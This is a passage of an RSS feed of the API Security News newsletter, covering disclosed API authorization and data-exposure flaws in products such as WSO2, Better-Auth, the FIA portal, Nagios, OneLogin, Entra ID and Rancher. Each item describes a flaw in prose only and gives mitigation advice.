		<category><![CDATA[GenAI]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11416</guid>

					<description><![CDATA[<p>This week, our theme is API authorization vulnerabilities. We cover critical issues discovered in the WSO2 API Manager and the Better-Auth plugin, share an eye-opening BOPLA vulnerability in a Formula 1 registration API, and examine familiar API security flaws appearing more often in industrial devices. We also highlight a recent interview with former CISA director [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-283-ai-security-solutions-formula-1s-api-flaw-latest-owasp-authorization-incidents/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-283-ai-security-solutions-formula-1s-api-flaw-latest-owasp-authorization-incidents/">Issue 283: AI Security Solutions, Formula 1’s API Flaw, Latest OWASP Authorization Incidents</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, our theme is API authorization vulnerabilities. We cover critical issues discovered in the WSO2 API Manager and the Better-Auth plugin, share an eye-opening BOPLA vulnerability in a Formula 1 registration API, and examine familiar API security flaws appearing more often in industrial devices. We also highlight a recent interview with former CISA director Jen Easterly about the potential, and risks, of using AI to solve today’s security challenges. </span></p>
<h2><span style="font-weight: 400;">Article: Is AI the silver bullet for software vulnerabilities?</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a recent article, former CISA Director Jen Easterly highlights some uncomfortable truths:</span></p>
<blockquote>
<p style="font-weight: 400; padding-left: 40px;"><i><span style="font-weight: 400;">“The common factors uncovered by MITRE nearly 20 years ago – cross-site scripting, memory unsafe coding, SQL injection, directory traversal – remain part and parcel of shipped software.”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">This aligns closely with our research at APISecurity.io. Over the past year, roughly 25% of all API security cases we’ve covered involved injection attacks, path traversal, or server-side request forgery (SSRF). These are long-standing, well-known vulnerabilities that existed long before web APIs were a thing, yet they continue to appear in production APIs.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Easterly suggests AI could help, though with important caveats:</span></p>
<blockquote>
<p style="font-weight: 400; padding-left: 40px;"><i><span style="font-weight: 400;">&#8220;If we&#8217;re able to build and deploy and govern these incredibly powerful technologies in a secure way, I believe it will lead to the end of cybersecurity.&#8221;</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">The reality today though is miles away from this ideal. A 2025 GitHub </span><a href="https://survey.stackoverflow.co/2025/ai#developer-tools" target="_blank" rel="noopener"><span style="font-weight: 400;">survey</span></a><span style="font-weight: 400;"> found that most experienced developers do not trust AI-generated code. And two frustrations stood out: 66% of developers struggle with AI solutions that are “almost right, but not quite,” and 45% find debugging AI-generated code more time-consuming than writing it manually. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">AI, like any security tool, is not a magic wand. But it can be effective if it&#8217;s placed in the hands of experienced developers to help automate practices and processes intelligently. As Jen Easterly emphasizes, real security comes from building systems securely from the start. Without the software engineering discipline, AI is more likely to amplify vulnerabilities and frustrations than prevent them. </span><a href="https://www.theregister.com/2025/10/27/jen_easterly_ai_cybersecurity/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Racing to an F1 authorization vulnerability</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Fancy becoming a registered Formula 1 driver? There’s a vulnerable API for that!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers Ian Carroll, Gal Nagli, and Sam Curry, recently uncovered a number of API flaws in the registration portal of Fédération Internationale de l&#8217;Automobile (FIA), the governing body for world motorsport. One API allowed users to elevate their role to administrator, and get access to privileged services and sensitive data, including the personally identifiable information (PII) of Dutch F1 driver Max Verstappen!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Two classic OWASP API vulnerabilities were exploited. First, excessive data exposure in the response to an API PUT request leaked “hidden” properties, like user role and status. Using those properties, the researchers then attempted an API mass assignment attack to change their user role to administrator, and it worked! </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Excessive data exposure and mass assignment vulnerabilities are together categorized as Broken Object Property Level Authorization (BOPLA) in the latest OWASP API vulnerability list.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This case is another useful lesson on the need to tightly constrain an API’s allowed input and output properties, using schemas or API specifications. Otherwise hackers, ethical or otherwise, will find vulnerable entry points to exploit. </span><a href="https://ian.sh/fia" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report.</span></a><span style="font-weight: 400;"> </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Better-Auth’s API coding error </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Better-Auth, a popular open-source plugin for authentication and authorization, was recently found to have a critical API vulnerability. A logic error in the service for API key creation allowed any user to retrieve a valid API key for any other registered user, without needing their credentials.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the code, if a request for an API key includes either a valid session </span><b>or </b><span style="font-weight: 400;">a valid user ID, the API skips authentication. That means if an unauthenticated user knows or can guess another user&#8217;s ID, they can send just the ID to the API and will receive back an API key for that user. If you’re interested in the technical details you can see the </span><a href="https://github.com/better-auth/better-auth/compare/v1.3.25...v1.3.26#diff-c77382c4a89deddb31c723b8e1f9625b580a70c88e1845433976920c5e677c6c" target="_blank" rel="noopener"><span style="font-weight: 400;">GitHub code comparison highlighting the logic flaw and its fix.</span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Missing or broken authentication is a common API vulnerability, and attackers often look for “enabling vulnerabilities” like logic flaws to bypass access controls. These issues can be especially tricky to detect because every API has unique input properties and security checks, and bypass mechanisms are typically very specific to the developer and the logic they code. Careful API design and early testing of the API logic can help prevent or detect these types of vulnerabilities early on. </span><a href="https://cybersecuritynews.com/better-auth-api-keys-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Broken authentication in WSO2 API Manager</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">WSO2 API Manager uses method contexts to define and apply security rules for API operations. The rules set out:  </span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>context</b><span style="font-weight: 400;"> = which URL or endpoint the rule applies to</span></li>
<li style="font-weight: 400;" aria-level="1"><b>http_method</b><span style="font-weight: 400;"> = which HTTP method (GET, POST, PUT, DELETE, etc.)</span></li>
<li style="font-weight: 400;" aria-level="1"><b>secure</b><span style="font-weight: 400;"> = whether this endpoint requires authentication</span></li>
<li style="font-weight: 400;" aria-level="1"><b>permissions</b><span style="font-weight: 400;"> = which user roles or permissions are allowed</span></li>
<li style="font-weight: 400;" aria-level="1"><b>scopes</b><span style="font-weight: 400;"> = which OAuth2 scopes are required for access</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of the API platform’s own APIs were missing these method contexts (</span><a href="https://github.com/wso2/product-apim/pull/13813/files" target="_blank" rel="noopener"><span style="font-weight: 400;">you can see examples here</span></a><span style="font-weight: 400;">), exposing administrator-level operations without any authentication or authorization. </span></p>
<blockquote>
<p style="font-weight: 400; text-align: left; padding-left: 40px;"><i><span style="font-weight: 400;">“The successful exploitation of this vulnerability could allow an attacker to gain administrative privileges and perform unauthorized operations.”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">This case highlights the importance of verifying that every API endpoint requiring authentication and authorization actually enforces it. Testing should happen both before API deployment and continually in production to catch any changes or drift in APIs access control behavior. </span><a href="https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4483/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the advisory.</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Industrial System’s BFLA Vulnerability</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Moxa is a provider of industrial networking solutions. They recently released a security advisory  that included four API vulnerabilities in their network security appliances and routers. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Modern industrial devices often expose APIs for remote configuration, administration portals, or monitoring apps. API security incidents in industrial systems are relatively new, but we’re seeing cases more frequently as these systems become increasingly interconnected.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It’s also noticeable that the same API vulnerabilities commonly seen in web applications also appear in industrial APIs. Like the previous cases we looked at earlier for WSO2 API Manager and the Better-Auth plugin, Moxa’s “protected” APIs were missing authorization controls. </span></p>
<blockquote>
<p style="font-weight: 400; text-align: left; padding-left: 40px;"><i><span style="font-weight: 400;">“A flaw in the API authentication mechanism allows unauthorized access to protected API endpoints, including those intended for administrative functions.”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">Without authorization checks, low-privileged users could access administrator-level functions to modify system configurations, perform internal network reconnaissance, and even create new administrator accounts. That’s a classic case of </span><a style="font-weight: 400;" href="https://apisecurity.io/owasp-api-security-top-10/api5-2023-broken-function-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">Broken Function Level Authorization</span></a><span style="font-weight: 400;">, another common API vulnerability that escapes the attention of API teams. </span><a style="font-weight: 400;" href="https://www.moxa.com/en/support/product-support/security-advisory/mpsa-258121-cve-2025-6892,-cve-2025-6893,-cve-2025-6894,-cve-2025-6949,-cve-2025-6950-multiple-vulnerabilities-in-netwo" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the advisory</span></a><span style="font-weight: 400;">.</span></p>
<p>The post <a href="https://apisecurity.io/issue-283-ai-security-solutions-formula-1s-api-flaw-latest-owasp-authorization-incidents/">Issue 283: AI Security Solutions, Formula 1’s API Flaw, Latest OWASP Authorization Incidents</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 282: Poker Hacks, Credential Leaks, API Injection Threats, and DDoS Risks</title>
		<link>https://apisecurity.io/issue-282-poker-hacks-credential-leaks-api-injection-threats-and-ddos-risks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 16 Oct 2025 15:03:50 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11408</guid>

					<description><![CDATA[<p>This week, we examine a World Poker Tour website hack and also the exposure of Nagios Log Server API credentials, we explore an article on the causes of API drift, review common injection attacks targeting APIs, and highlight how DDoS campaigns are increasingly focusing on API endpoints. Vulnerability: Security Pros Go All In on Poker [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-282-poker-hacks-credential-leaks-api-injection-threats-and-ddos-risks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-282-poker-hacks-credential-leaks-api-injection-threats-and-ddos-risks/">Issue 282: Poker Hacks, Credential Leaks, API Injection Threats, and DDoS Risks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we examine a World Poker Tour website hack and also the exposure of Nagios Log Server API credentials, we explore an article on the causes of API drift, review common injection attacks targeting APIs, and highlight how DDoS campaigns are increasingly focusing on API endpoints.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Security Pros Go All In on Poker Website </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security researchers </span><b>Sam Curry</b><span style="font-weight: 400;"> and </span><b>Shubs Shah</b><span style="font-weight: 400;"> uncovered a series of vulnerabilities that granted unauthorized access to the administrator panel of the online poker platform ClubWPT Gold.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Early in their investigations, the researchers discovered the full source code for the admin application exposed online. Using information from an exposed configuration file, hardcoded credentials, and easily guessed passwords, they were able to log in to a staging environment of the admin app.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Unfortunately, the same credentials were reused in the production site. Then the only remaining barrier to gaining full admin access to the production site was two-factor authentication (2FA).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">That didn’t hold up for long. The researchers identified a vulnerable admin endpoint that failed to enforce authentication, allowing them to reset 2FA secrets for any admin user account as long as they could guess a valid user ID (uid).</span></p>
<p><img loading="lazy" decoding="async" class="alignnone  wp-image-11413" src="https://apisecurity.io/wp-content/uploads/2025/10/APIsecurity.io-issue-282-SamCurry-Http-Request-300x99.png" alt="" width="797" height="263" srcset="https://apisecurity.io/wp-content/uploads/2025/10/APIsecurity.io-issue-282-SamCurry-Http-Request-300x99.png 300w, https://apisecurity.io/wp-content/uploads/2025/10/APIsecurity.io-issue-282-SamCurry-Http-Request-768x253.png 768w, https://apisecurity.io/wp-content/uploads/2025/10/APIsecurity.io-issue-282-SamCurry-Http-Request.png 840w" sizes="auto, (max-width: 797px) 100vw, 797px" /></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">Image from the report at <a href="https://samcurry.net/" target="_blank" rel="noopener">samcurry.net</a></span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">With this flaw, the team gained access to sensitive data on real poker players, including personal details, deposits, and account information.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While several weaknesses contributed to the compromise, the </span><b>failure to enforce authentication</b> <b>on the admin endpoint proved crucial</b><span style="font-weight: 400;">, since it allowed the researchers to effectively bypass 2FA protections in the production environment. </span><a href="https://samcurry.net/hacking-clubwpt-gold" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Credentials Exposed in Nagios Log Server API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a previous </span><a href="https://apisecurity.io/issue-281-onelogin-leaks-secrets-cloudflare-api-dos-entra-id-flaw-owasp-bopla-bugs/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue</span></a><span style="font-weight: 400;">, we covered an incident at OneLogin where sensitive client secrets were leaked in plaintext through a vulnerable API response. Researchers </span><b>Seth Kraft</b><span style="font-weight: 400;"> and </span><b>Alex Tisdale</b><span style="font-weight: 400;"> have identified similar flaws in the Nagios Log Server platform.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This issue was originally reported a few months ago, but it again highlights how common it is for APIs to expose highly sensitive data. In this case, a non-privileged user could send a simple GET request to a vulnerable endpoint and receive a list of user records, including usernames and API keys belonging to administrator accounts.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researcher Seth Kraft also shared a short demonstration video of the exploit on </span><a href="https://www.linkedin.com/posts/seth-kraft_owasp-cybersecurity-appsec-activity-7311504568104718337-8y9_" target="_blank" rel="noopener"><span style="font-weight: 400;">LinkedIn</span></a><span style="font-weight: 400;">.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11409" src="https://apisecurity.io/wp-content/uploads/2025/10/credential_leak_Nagios-300x121.png" alt="" width="798" height="322" srcset="https://apisecurity.io/wp-content/uploads/2025/10/credential_leak_Nagios-300x121.png 300w, https://apisecurity.io/wp-content/uploads/2025/10/credential_leak_Nagios-768x310.png 768w, https://apisecurity.io/wp-content/uploads/2025/10/credential_leak_Nagios.png 1000w" sizes="auto, (max-width: 798px) 100vw, 798px" /></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">Sample from </span></i><a href="https://www.exploit-db.com/exploits/52177" target="_blank" rel="noopener"><i><span style="font-weight: 400;">exploit-db.com</span></i></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This type of excessive data exposure vulnerability falls under OWASP API3:2023, and often occurs when an API is implemented to return entire database objects without proper filtering or authorization checks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is where defining and maintaining an OpenAPI definition for APIs can help, by forcing teams to explicitly document which response properties should be exposed, and by enabling automated checks to detect drift between the intended design and runtime behavior of the API. </span><a href="https://gbhackers.com/nagios-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article.</span></a></p>
<h2><span style="font-weight: 400;">Article: Staying Ahead of API Drift</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing on the subject of API drift, </span><b>Kin Lane</b><span style="font-weight: 400;"> of API Evangelist recently shared insights from his experience working on an API governance program at Bloomberg.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">He points out how API drift often stems from gaps in communication and vocabulary between engineering and business teams. It&#8217;s an interesting perspective, because discussions of API drift typically focus on unsanctioned code changes, misconfigurations, or even malicious API tampering.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For those unfamiliar, API drift occurs when an API’s production behavior deviates from its documented specification. Distinct from the traditional monolithic applications, APIs are updated frequently to meet rapidly changing business demands, whether that means new services, integrations, or hooking up the latest AI tool to some product or service.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As Kin points out, minimizing API drift requires maintaining </span><b>alignment between product intent</b><span style="font-weight: 400;">, usually captured in text-based documentation, and </span><b>development intent</b><span style="font-weight: 400;">, expressed through schemas and API definitions. Bridging these silos is a key factor to keeping APIs predictable and avoiding drift. </span><a href="https://apievangelist.com/2025/10/15/why-drift-is-ubiquitous/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Article: Risks of API Injection Attacks </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">An article by </span><b>Nordic APIs</b><span style="font-weight: 400;"> sets out some of the more dangerous or novel injection attacks that often target APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article includes examples of various attacks delivered through API properties and headers, as well as specific injection cases involving template values or URLs provided as user input, both of which we’ve covered in previous issues of this newsletter.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As an aside, it’s curious that injection vulnerabilities aren’t called out in the OWASP API Top 10 list. Admittedly it’s already a separate category in </span><i><span style="font-weight: 400;">OWASP Top 10 2021, A03: Injection</span></i><span style="font-weight: 400;">, but then so is </span><i><span style="font-weight: 400;">Security Misconfiguration</span></i><span style="font-weight: 400;"> (A05), which is also included in the API Top 10 (API8). Given the prevalence and risk of injection attacks on APIs, it might be worth emphasizing in the OWASP API vulnerability list.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Automation tools like DAST (Dynamic Application Security Testing) are often used to simulate traditional injection attacks against websites and web applications using wordlists of common attack patterns. The challenge with APIs is that each one is unique, supporting a different set of input properties and processing logic. You have to get really lucky with DAST to hit on the particular injection pattern that can exploit a flaw in any given API. Knowing something about the context of the service behind the API helps to generate more relevant and targeted injection tests. There isn’t much benefit in running hundreds of SQL injection attacks against an API that uses a NoSQL database!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A great article on API vulnerabilities and well worth a read.</span><a href="https://nordicapis.com/6-api-injection-attacks-youre-probably-not-testing-for/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Article: APIs in the Crosshairs of DDoS Attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the previous </span><a href="https://apisecurity.io/issue-281-onelogin-leaks-secrets-cloudflare-api-dos-entra-id-flaw-owasp-bopla-bugs/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue</span></a><span style="font-weight: 400;"> of the newsletter, we covered a case of an accidental denial-of-service incident on one of Cloudflare’s API endpoints caused by a frontend coding error. A recent article on EM360Tech, </span><i><span style="font-weight: 400;">“The API Blind Spot: How DDoS Attacks Are Bypassing Defences”</span></i><span style="font-weight: 400;">, is a timely reminder of how API-targeted DDoS attacks are evolving, and why they’re often overlooked.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article highlights the growing complexity of DDoS threats against APIs, pointing to both poor development practices and the emergence of AI-driven attack automation. It also outlines several attack types now common in the industry, from familiar flood and credential-stuffing attacks to more subtle Slowloris and Amplification attacks that can exhaust API resources while appearing as legitimate API traffic.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The key takeaway: mitigating API-level DDoS requires building secure APIs from the earliest stages of development, and implementing strong authentication and authorization ensures that only legitimate API users can access resources. Combined with measures like rate limiting and enforcing constraints on payload size, these practices help reduce the risk of API abuse and make DDoS attacks harder to execute. </span><a href="https://em360tech.com/tech-articles/api-blind-spot-how-ddos-attacks-bypass-defences" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">. </span></p>
<p>The post <a href="https://apisecurity.io/issue-282-poker-hacks-credential-leaks-api-injection-threats-and-ddos-risks/">Issue 282: Poker Hacks, Credential Leaks, API Injection Threats, and DDoS Risks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 281: OneLogin leaks secrets, Cloudflare API DoS, Entra ID flaw, OWASP BOPLA bugs</title>
		<link>https://apisecurity.io/issue-281-onelogin-leaks-secrets-cloudflare-api-dos-entra-id-flaw-owasp-bopla-bugs/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 02 Oct 2025 11:28:48 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<category><![CDATA[data exposure]]></category>
		<category><![CDATA[owasp]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11394</guid>

					<description><![CDATA[<p>This week: we share a report about OneLogin suffering an API data leak, we also have Cloudflare’s postmortem on an accidental API DoS. We look at researcher Dirk-jan Mollema’s disclosure of a critical Entra ID vulnerability, also incidents of mass assignment and excessive data exposure in Rancher and Apache Airflow APIs, and finally Nokia platforms [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-281-onelogin-leaks-secrets-cloudflare-api-dos-entra-id-flaw-owasp-bopla-bugs/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-281-onelogin-leaks-secrets-cloudflare-api-dos-entra-id-flaw-owasp-bopla-bugs/">Issue 281: OneLogin leaks secrets, Cloudflare API DoS, Entra ID flaw, OWASP BOPLA bugs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week: we share a report about OneLogin suffering an API data leak, we also have Cloudflare’s postmortem on an accidental API DoS. We look at researcher Dirk-jan Mollema’s disclosure of a critical Entra ID vulnerability, also incidents of mass assignment and excessive data exposure in Rancher and Apache Airflow APIs, and finally Nokia platforms hit by authentication bypass via malicious API headers.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Secrets Leaked by OneLogin API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers at Clutch Security disclosed an incident involving excessive data exposure in OneLogin’s Identity and Access Management (IAM) platform. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerable API endpoint is designed to list all OpenID Connect applications configured in a OneLogin tenant, and is accessible to any user with valid API credentials. But the researchers found that the response also included the </span><b>client_secret</b><span style="font-weight: 400;"> property in plaintext for every application. This secret functions like a password for authenticating authorized clients, making its exposure highly sensitive.</span></p>
<p><img loading="lazy" decoding="async" class="wp-image-11395 aligncenter" src="https://apisecurity.io/wp-content/uploads/2025/10/image-oneLogin-300x57.png" alt="" width="800" height="152" srcset="https://apisecurity.io/wp-content/uploads/2025/10/image-oneLogin-300x57.png 300w, https://apisecurity.io/wp-content/uploads/2025/10/image-oneLogin-1024x193.png 1024w, https://apisecurity.io/wp-content/uploads/2025/10/image-oneLogin-768x145.png 768w, https://apisecurity.io/wp-content/uploads/2025/10/image-oneLogin-1536x290.png 1536w, https://apisecurity.io/wp-content/uploads/2025/10/image-oneLogin.png 1800w" sizes="auto, (max-width: 800px) 100vw, 800px" /></p>
<p style="text-align: center;"><i><span style="font-weight: 400;">Image from Clutch Security report</span></i></p>
<p><span style="font-weight: 400;">Unfortunately, sensitive credentials leaked in API responses is a common enough problem. In APISecurity.io <a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/" target="_blank" rel="noopener">issue 240</a></span><span style="font-weight: 400;">, for example, a social networking platform’s leaky API exposed passwords, two-factor authentication tokens, and other confidential data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Multiple factors can lead to these types of leaks: unsanctioned code changes, misconfigurations, or malicious data injected from upstream third-party APIs, or, increasingly, AI agents and LLMs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One effective mitigation is using </span><b>runtime schema validation</b><span style="font-weight: 400;"> on your most critical or sensitive APIs, which constrains response data to only the expected and authorized properties, preventing sensitive information from being inadvertently exposed. </span><a href="https://www.clutch.security/blog/onelogin-many-secrets-clutch-uncovers-vulnerability-exposing-client-credentials" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a></p>
<h2><span style="font-weight: 400;">Failure: Cloudflare Outage Caused by API Overload</span></h2>
<p><span style="font-weight: 400;">The term </span><i><span style="font-weight: 400;">denial of service</span></i><span style="font-weight: 400;"> (DoS) often crops up in news of malicious cyberattacks, but it can also happen by accident. A software bug in Cloudflare&#8217;s dashboard frontend code caused it to repeatedly call Cloudflare’s Tenant Services API, quickly overwhelming the service. Javascript developers will be familiar with the risk of unintentional loops from misusing React hooks, which appears to be what happened in this case.</span></p>
<p><img loading="lazy" decoding="async" class="wp-image-11397 aligncenter" src="https://apisecurity.io/wp-content/uploads/2025/10/image-cloudflare-300x58.png" alt="" width="797" height="154" srcset="https://apisecurity.io/wp-content/uploads/2025/10/image-cloudflare-300x58.png 300w, https://apisecurity.io/wp-content/uploads/2025/10/image-cloudflare-1024x198.png 1024w, https://apisecurity.io/wp-content/uploads/2025/10/image-cloudflare-768x148.png 768w, https://apisecurity.io/wp-content/uploads/2025/10/image-cloudflare-1536x297.png 1536w, https://apisecurity.io/wp-content/uploads/2025/10/image-cloudflare.png 1999w" sizes="auto, (max-width: 797px) 100vw, 797px" /></p>
<p style="text-align: center;"><i><span style="font-weight: 400;">Image from Cloudflare Blog Report</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Cloudflare’s postmortem describes how the API outage rippled across their systems, disrupting other services including a critical API authorization function. One of the biggest challenges in managing cascading failures is diagnosing the root cause while simultaneously working to restore availability. In this case, the team set a global rate limit to help regulate the API traffic.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Global rate limiting can help shield infrastructure during a DoS event, whether accidental or malicious, but that can be a blunt instrument. Enforcing limits at the API level, especially for high-value services, can help to reduce the risk of failures spreading to dependent systems, and pinpoint the cause of an outage when similar mistakes, or attacks, occur. </span><a href="https://blog.cloudflare.com/deep-dive-into-cloudflares-sept-12-dashboard-and-api-outage/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report.</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Entra ID Tenants Exposed by Global API Token</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researcher Dirk-jan Mollema recently disclosed a critical access control flaw in Microsoft’s Entra ID that could allow a malicious user to take over other Entra ID tenants worldwide. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Entra ID (formerly Azure Active Directory) is widely used by organizations to manage user accounts and access control policies. Ironically, this case involved an access control platform with a significant access control vulnerability. Exploiting it could give attackers unrestricted access to all downstream services and applications that rely on Entra ID for authentication and authorization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The root cause stems from use of a global access token called Actor Tokens and a legacy API that failed to enforce proper tenant-level authorization. This flaw allowed a token issued in one tenant to be used to access any other Entra ID tenant, granting full access to the Azure AD Graph API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Authorization flaws continue to be one of the most common API vulnerabilities, though we don’t often see cases with the potential for such broad and high-impact consequences. This one is worth a full read. </span><a href="https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report.</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Mass Assignment Flaw in Rancher API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">SUSE Rancher is “an open source container management platform built for organizations that deploy containers in production”. One of the platform’s APIs allows update operations on user accounts via PUT requests. </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">A flaw in this API lets a privileged user modify another user’s username, potentially preventing that user from logging in; effectively causing a denial of service. The risk is particularly severe if the affected account belongs to an administrator.</span></p>
<p style="text-align: center;"><img loading="lazy" decoding="async" class="wp-image-11398 aligncenter" src="https://apisecurity.io/wp-content/uploads/2025/10/image-rancher-1-300x104.png" alt="" width="620" height="215" srcset="https://apisecurity.io/wp-content/uploads/2025/10/image-rancher-1-300x104.png 300w, https://apisecurity.io/wp-content/uploads/2025/10/image-rancher-1.png 549w" sizes="auto, (max-width: 620px) 100vw, 620px" /><br />
<i><span style="font-weight: 400;">Image from CyberSecurityNews article</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">At first glance, this appeared to be an OWASP Broken Function Level Authorization issue, as it seemed the API shouldn’t allow PUT operations on this resource. On further reading though it’s more accurately classified as an OWASP </span><b>Broken Object Property Level Authorization</b><span style="font-weight: 400;"> vulnerability (formerly known as Mass Assignment). The PUT operation should be allowed for privileged users, but the API should restrict updates to the username property once set. </span></p>
